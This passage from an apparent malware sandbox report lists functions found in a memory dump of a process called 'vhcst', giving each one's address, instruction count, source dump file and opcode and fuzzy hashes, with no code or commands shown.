                                                                                      • Instruction ID: 8cb4f59b54165515e92259031a0cb4a8c44e9e58c98c5992ed95a6d3f8792a1b
                                                                                      • Opcode Fuzzy Hash: c731d1ee721ec0f490f5e235ab7e2fc89ea2a58539bbfdb1a0c5d7cf0c5b2055
                                                                                      • Instruction Fuzzy Hash: EF51FB22A0F6C51FE7769BB458711A87FE0DF46354F0901FAD088CB4D7E91E690A8383
                                                                                      Function 00007FFD99E612D0 Relevance: .2, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27ad8614912950175070e24afd3e8f709d02e354bbba84519dd243f52494d102
                                                                                      • Instruction ID: 6fb1b42463ff2e7c5e013a7cd7ac891e035ab897f08b69cbc1b6b99d18060ea8
                                                                                      • Opcode Fuzzy Hash: 27ad8614912950175070e24afd3e8f709d02e354bbba84519dd243f52494d102
                                                                                      • Instruction Fuzzy Hash: 1B51DA62B0DA494FEBA9DE5894E467837C1EFA9308B0441BDD44EC72D7DD26AC81C742
                                                                                      Function 00007FFD99E21448 Relevance: .2, Instructions: 178COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 174468022a4c640f010d9c2f5c0e2551ad6c5d91a3ca1478c7496841dc9664cd
                                                                                      • Instruction ID: 15272a96f087092b85795cc541c42284c758ed309e7be10d5fa88e080754ad65
                                                                                      • Opcode Fuzzy Hash: 174468022a4c640f010d9c2f5c0e2551ad6c5d91a3ca1478c7496841dc9664cd
                                                                                      • Instruction Fuzzy Hash: 8241F571F0DE0D4FEBA8FE5C985A6B973D1FBA8314B14027AC40DD7195DD21A84283C1
                                                                                      Function 00007FFD99E1BA06 Relevance: .2, Instructions: 177COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 995076aa1d6ff4a358dc8754ad8d9983cbad56344f8f615bfd4d209a1133a444
                                                                                      • Instruction ID: 47851497b8e4e34fb48de4b7b65b0e1285c5eb9200fa2176f473efa29378fd8c
                                                                                      • Opcode Fuzzy Hash: 995076aa1d6ff4a358dc8754ad8d9983cbad56344f8f615bfd4d209a1133a444
                                                                                      • Instruction Fuzzy Hash: 9A51B535A0E6CA0FE7729B7448B55E57FB0EF43214B0D01F7D498CB497D91A680A8752
                                                                                      Function 00007FFD99E5B468 Relevance: .2, Instructions: 174COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 976be18f2f1e5ec7323b03b97e0057cb0569d8f7a12ae848efdcb0122c7d12f3
                                                                                      • Instruction ID: 2e910765a556bee95908e664c604d91742748721a3ff48c0eb6cc4c8a6b20beb
                                                                                      • Opcode Fuzzy Hash: 976be18f2f1e5ec7323b03b97e0057cb0569d8f7a12ae848efdcb0122c7d12f3
                                                                                      • Instruction Fuzzy Hash: 65514731B09A1A4FEB74DE5984E05B6B3E2FFA535AB04057ED08AC3196DE25FC058782
                                                                                      Function 00007FFD99E26F11 Relevance: .2, Instructions: 173COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2dce60bdb458608ed3b8cf127c59fcc8c81e99ac60549481a0e769857450fb30
                                                                                      • Instruction ID: 949c276b8b7550219da56e380e723f271c28a1eb68a23d5a86431274bc7b31a4
                                                                                      • Opcode Fuzzy Hash: 2dce60bdb458608ed3b8cf127c59fcc8c81e99ac60549481a0e769857450fb30
                                                                                      • Instruction Fuzzy Hash: FF41D622A0F6C94FEB715AB458755E97FE4EF46214F0902FAD098C74D3D91E290E4383
                                                                                      Function 00007FFD99E2A860 Relevance: .2, Instructions: 172COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7daa6880d0b7ad0379061b8f4cb38314095cf22a4665b206c71e66aa5bfa7b04
                                                                                      • Instruction ID: e7a691e1fc4423b76e2dae170f0ce4379673693ccdf8ce6ce73e07b5ff1b5995
                                                                                      • Opcode Fuzzy Hash: 7daa6880d0b7ad0379061b8f4cb38314095cf22a4665b206c71e66aa5bfa7b04
                                                                                      • Instruction Fuzzy Hash: E9419030719E098FEB59EF6CD4A5A79B3D2EF9971570401BDE00EC32A6DE25E841C782
                                                                                      Function 00007FFD99E1540D Relevance: .2, Instructions: 172COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 68f51347a274e093de77a2aeae756b5098ee2f1875be2bacff8e33d24cdc6ffb
                                                                                      • Instruction ID: 1ede7acacb5d2178bf2a466f0c45669833f5e1be8166d0d8448c87a6271abbd4
                                                                                      • Opcode Fuzzy Hash: 68f51347a274e093de77a2aeae756b5098ee2f1875be2bacff8e33d24cdc6ffb
                                                                                      • Instruction Fuzzy Hash: 5C519030E08B1C8FDB58EF98D8556EDBBF1FB98310F00426AD449D7256CA34A945CB82
                                                                                      Function 00007FFD99E2AAFA Relevance: .2, Instructions: 172COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 81cafa744ca99889bebb28d520a98d7010855204a6b1406e31030db87066a994
                                                                                      • Instruction ID: 04e04ac2588b72e9ea7364eed42e2c87a1e95966660920160d8e411fdbc16be7
                                                                                      • Opcode Fuzzy Hash: 81cafa744ca99889bebb28d520a98d7010855204a6b1406e31030db87066a994
                                                                                      • Instruction Fuzzy Hash: 3341673070EA4A4FEB68AEAC98A55B537C0EF55338B1401BDD44AC3197ED16F8028283
                                                                                      Function 00007FFD99E51EC0 Relevance: .2, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c516122a118baaf1b4af5222e48da27bdfd111df7dd1f5eb10801d56516b290a
                                                                                      • Instruction ID: 63bb499bce611a1d57d8b09559b6210bf8a17132efb4fa4de97873005fef00dc
                                                                                      • Opcode Fuzzy Hash: c516122a118baaf1b4af5222e48da27bdfd111df7dd1f5eb10801d56516b290a
                                                                                      • Instruction Fuzzy Hash: 5E413B30708A084FDAA8EF6CD498B6577D1FF59715F0541BAE48DC7266CE21EC81C782
                                                                                      Function 00007FFD99E118C7 Relevance: .2, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b5d6c9202d410a52d59bb5057db7096ce61c7f6c82e3bb960bbf6648d5872a8b
                                                                                      • Instruction ID: fed28bf47a917c19fb7d1f4308852a9f556f290b91a14155ebd1afd0e2ec5770
                                                                                      • Opcode Fuzzy Hash: b5d6c9202d410a52d59bb5057db7096ce61c7f6c82e3bb960bbf6648d5872a8b
                                                                                      • Instruction Fuzzy Hash: 1A518171F1EA4A4BDF68DE9888B16BC77E1EF98308F140179D05DA3292CE266841C752
                                                                                      Function 00007FFD99E108B9 Relevance: .2, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82d3be3f9861d8c9e3a1ad9562458f70e22f522c91c6a19be46fe6809c59bd23
                                                                                      • Instruction ID: 3cb90e97bbf9c8c65cb51c0cad52c0505997dd0bb2c9d44c4321fe7d33208dbf
                                                                                      • Opcode Fuzzy Hash: 82d3be3f9861d8c9e3a1ad9562458f70e22f522c91c6a19be46fe6809c59bd23
                                                                                      • Instruction Fuzzy Hash: A651E532A0E6D90EE7725AB458765E97BE0DF86325F0901FBD48CDB0D3D81A1D0A8393
                                                                                      Function 00007FFD99E1D8C5 Relevance: .2, Instructions: 166COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7cf5c8d7a2ef34dea57e516f9dda7857ace36473d21607a5118be5b6c587edc9
                                                                                      • Instruction ID: 689dd961667a30f1e521bc476af2f81fa561b7be0184ec7f3f0b745c26944f03
                                                                                      • Opcode Fuzzy Hash: 7cf5c8d7a2ef34dea57e516f9dda7857ace36473d21607a5118be5b6c587edc9
                                                                                      • Instruction Fuzzy Hash: C451E521E0E6D90FE7729AB448761E57FA4DF46324F0902FBD488CB0D3D91A684A8343
                                                                                      Function 00007FFD99E15DA8 Relevance: .2, Instructions: 166COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dad648825dd7bbe3ced7009a18f4476762f8677dda61e9773bf015e11945734e
                                                                                      • Instruction ID: fbfaff25d8e0e3a7ef5167952eda3e6cac36ad73444857e205a557b5fb824f57
                                                                                      • Opcode Fuzzy Hash: dad648825dd7bbe3ced7009a18f4476762f8677dda61e9773bf015e11945734e
                                                                                      • Instruction Fuzzy Hash: 92512931A0E6990EE7719A7458615F97BE1EF52328F0405BEF09DC70D3EE1E650A8783
                                                                                      Function 00007FFD99E16B28 Relevance: .2, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8cb98f2177d38ae0c0db7fbdc0da795ad6b43a06d284da39454a8e7e9d369eba
                                                                                      • Instruction ID: ecfa813cd12daa672c07b1ef862c9fa4500453c7106f8c256e844018f4daa582
                                                                                      • Opcode Fuzzy Hash: 8cb98f2177d38ae0c0db7fbdc0da795ad6b43a06d284da39454a8e7e9d369eba
                                                                                      • Instruction Fuzzy Hash: 48412E32B1DA498AFF7A6ADCA8E61FD77D1EF98328F04107EE44DC3192DD1668014297
                                                                                      Function 00007FFD99E2B728 Relevance: .2, Instructions: 162COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eb41e6bc31553c0d71c9177d7648284b10b6eda23c73c26a90ac6c25f98fedf5
                                                                                      • Instruction ID: c450a15ad4175af7206e9ae1fcb9d456daadeeb21f37c988f5c2085b3ea0ae0f
                                                                                      • Opcode Fuzzy Hash: eb41e6bc31553c0d71c9177d7648284b10b6eda23c73c26a90ac6c25f98fedf5
                                                                                      • Instruction Fuzzy Hash: AA41ED31B0D6054BDB6CEE98A4A66F977D1EF95328F08467ED08E871C7DD26B8018386
                                                                                      Function 00007FFD99E26C8D Relevance: .2, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 598c03c51ae3dbf793cb62778339a8c0c17a4b9c449fe6882f08791c40c504c9
                                                                                      • Instruction ID: c53ceb5533dfbc17c44d893d9729411f6092c2336f4633004329cad1892bb402
                                                                                      • Opcode Fuzzy Hash: 598c03c51ae3dbf793cb62778339a8c0c17a4b9c449fe6882f08791c40c504c9
                                                                                      • Instruction Fuzzy Hash: E3412331E0DE0D4FEBA8EF5C985A6B977E1FBA8310F04027BC44DD7196DD25A8428782
                                                                                      Function 00007FFD99E5BAB0 Relevance: .2, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fda7b9b7f15983993d202378ef9dca75834a19a06d7d7882798cce2af4699879
                                                                                      • Instruction ID: 1061777fb8a78003df6168681862d94de5e81ff629f3a3e070fb8bb5f8bd8c13
                                                                                      • Opcode Fuzzy Hash: fda7b9b7f15983993d202378ef9dca75834a19a06d7d7882798cce2af4699879
                                                                                      • Instruction Fuzzy Hash: 8241F635B0DA0A4BEFB4AE9894D567573D1EF58379F0C053AC44AC31E2DD2AB8428683
                                                                                      Function 00007FFD99E2D24D Relevance: .2, Instructions: 158COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e1be6926ea4ed14a2aeec4a40080b78196d13c66a6b1f05077cf114e696f23a
                                                                                      • Instruction ID: cab983982c99406c84e8ffdcb141768e1045daaf08a6a777140a8d1f42fca559
                                                                                      • Opcode Fuzzy Hash: 0e1be6926ea4ed14a2aeec4a40080b78196d13c66a6b1f05077cf114e696f23a
                                                                                      • Instruction Fuzzy Hash: 88412C52E0EACE1FD7639BA858B51F97FD0EF56214F5802F9D049C7097C81A69468342
                                                                                      Function 00007FFD99E2B7A8 Relevance: .2, Instructions: 157COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 76119c0b44dfbe5a6b9a477a4d31a887f136e8fa21a3fddda17613267d4bab29
                                                                                      • Instruction ID: c94e682b44fb2d808cd0fa140a557a7fdb06bb82e3210a281fd870d29f69d4bf
                                                                                      • Opcode Fuzzy Hash: 76119c0b44dfbe5a6b9a477a4d31a887f136e8fa21a3fddda17613267d4bab29
                                                                                      • Instruction Fuzzy Hash: AA41FB3160D6044BDB68EE9CA4A26F973D1FF99324F04467EE08EC71C7DE26B8018386
                                                                                      Function 00007FFD99E10A3F Relevance: .2, Instructions: 154COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dde9699cd92099e76c112067b77ab9ce39ae5c0eede8fa5a3dcdaf063d3f1a09
                                                                                      • Instruction ID: 8074312f132bdae8c2ab82a833cfc3ac39cda5edf4418e52d81f6f5033f654e7
                                                                                      • Opcode Fuzzy Hash: dde9699cd92099e76c112067b77ab9ce39ae5c0eede8fa5a3dcdaf063d3f1a09
                                                                                      • Instruction Fuzzy Hash: BF516170608A4E8FDB94EF58C894AFA73F1FF58305F504A69E429C7295CB35E851CB81
                                                                                      Function 00007FFD99E26196 Relevance: .2, Instructions: 153COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 65a29bb503cd76d679bc3c43d514c1532dcdafcd424d6addf37ce6e2c2b913d0
                                                                                      • Instruction ID: 3f6d7ff6339561a83d58085ab7e7998f7020371449d2c5ceb2ce63559edb3afe
                                                                                      • Opcode Fuzzy Hash: 65a29bb503cd76d679bc3c43d514c1532dcdafcd424d6addf37ce6e2c2b913d0
                                                                                      • Instruction Fuzzy Hash: 1541E43170EA8D4FDB59EFBC94A5AB977E1EF9931070006BEC04AC71A2DD36A852C740
                                                                                      Function 00007FFD99E1B163 Relevance: .2, Instructions: 152COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 026d8c682a138d3dbe8fc3476294535e0da0e0c1caa7a658e74fb92e0bad32fb
                                                                                      • Instruction ID: 5fc71cbaad6674afc3fa51e88c3a46c39fda0badd32d096d9457c012024f1290
                                                                                      • Opcode Fuzzy Hash: 026d8c682a138d3dbe8fc3476294535e0da0e0c1caa7a658e74fb92e0bad32fb
                                                                                      • Instruction Fuzzy Hash: 49516C30708A8E4FDB45EF68C8A5AEA77F1FF48314F4805B9D859CB296CE35A852C741
                                                                                      Function 00007FFD99E2B7A0 Relevance: .2, Instructions: 151COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 30cf1e96d60b9a5cb20fc43ad4a26febe0934565756d6bd33ed260419697ffd7
                                                                                      • Instruction ID: db4d89f858ac417bc77711e7baf2ded87db05d12b51643f183be366ced5ca3a7
                                                                                      • Opcode Fuzzy Hash: 30cf1e96d60b9a5cb20fc43ad4a26febe0934565756d6bd33ed260419697ffd7
                                                                                      • Instruction Fuzzy Hash: A241843171DA085FEBA8DA5CA49277573D1FB99324F14457EE08EC3282DE26B8064782
                                                                                      Function 00007FFD99E2BA08 Relevance: .1, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 558e92d9d62eb877a1cef2d681abfb74217cde99048fd931ec801be15e11caf9
                                                                                      • Instruction ID: eb86aa7e78890fb4ed37abee26ecc8be06b46956d77bdac181a52311db972169
                                                                                      • Opcode Fuzzy Hash: 558e92d9d62eb877a1cef2d681abfb74217cde99048fd931ec801be15e11caf9
                                                                                      • Instruction Fuzzy Hash: CE41A420B0AA1A4FE7F8DE6994E877563D1FF9431AF544279D00DC71C5DE2BE8828341
                                                                                      Function 00007FFD99E11B35 Relevance: .1, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f8f46336740dd9deae0970aaf63e837db5a5f37b29bc3642e3758c1f058a5095
                                                                                      • Instruction ID: e419ec19f1854b3bf17ee63f982dfd946a20bc94cc7ab1d258d48c4944a65ba5
                                                                                      • Opcode Fuzzy Hash: f8f46336740dd9deae0970aaf63e837db5a5f37b29bc3642e3758c1f058a5095
                                                                                      • Instruction Fuzzy Hash: D2513F7160DA8A8FDBACDF18C8A4A7537A1FF59308B1405ADE469C72D2CB36E852C741
                                                                                      Function 00007FFD99E2BA5D Relevance: .1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f7763de95f46c53e993f284cb6e3451e57d43e5a13430d2323f58a8c8cf8b8c2
                                                                                      • Instruction ID: 7bd026afd52c732f77fcdba5c96076f233f4b639220645b72bb77233523eebf3
                                                                                      • Opcode Fuzzy Hash: f7763de95f46c53e993f284cb6e3451e57d43e5a13430d2323f58a8c8cf8b8c2
                                                                                      • Instruction Fuzzy Hash: 8741FC21B0D90A4BEB69BF5894B46B937C1EF9931CF0941BAD40DCB1D7DD16AC818782
                                                                                      Function 00007FFD99E63D40 Relevance: .1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b36cd61d4d717337c615fba9fb08f6995f88b914850dc3b81f47f9fb5efb349
                                                                                      • Instruction ID: f8497b3757c4d89e7cbab94cb740e93dbecc0e94e0a06302da645dff253cf508
                                                                                      • Opcode Fuzzy Hash: 5b36cd61d4d717337c615fba9fb08f6995f88b914850dc3b81f47f9fb5efb349
                                                                                      • Instruction Fuzzy Hash: CF41C532B1D74A4FEB689E68C4D8A7177E0EF15309B1842F9C44AC7197DE26EC86C742
                                                                                      Function 00007FFD99E264D0 Relevance: .1, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 316227da9d6106633e44f8d46a1942c24e3ac0b31cccaf9261c150a448444377
                                                                                      • Instruction ID: 8b8a40fc58d1c221c22119bdb4a9d044102e5451b1bf3e3cbcb48e143991246a
                                                                                      • Opcode Fuzzy Hash: 316227da9d6106633e44f8d46a1942c24e3ac0b31cccaf9261c150a448444377
                                                                                      • Instruction Fuzzy Hash: 2C318F21B1E9490FE7689B6C68E61BE77D1EF99728B1406BBD40DC31D6DC16584283C3
                                                                                      Function 00007FFD99E2B998 Relevance: .1, Instructions: 141COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 73e5498e71177839047ddc0c801f508ab60d6d8bca7300c127ffe5c67000bbc8
                                                                                      • Instruction ID: 0fbe92b6c8173d13f54aa95fa2d35a369490ad2bc24d44aabc39ad0c63392281
                                                                                      • Opcode Fuzzy Hash: 73e5498e71177839047ddc0c801f508ab60d6d8bca7300c127ffe5c67000bbc8
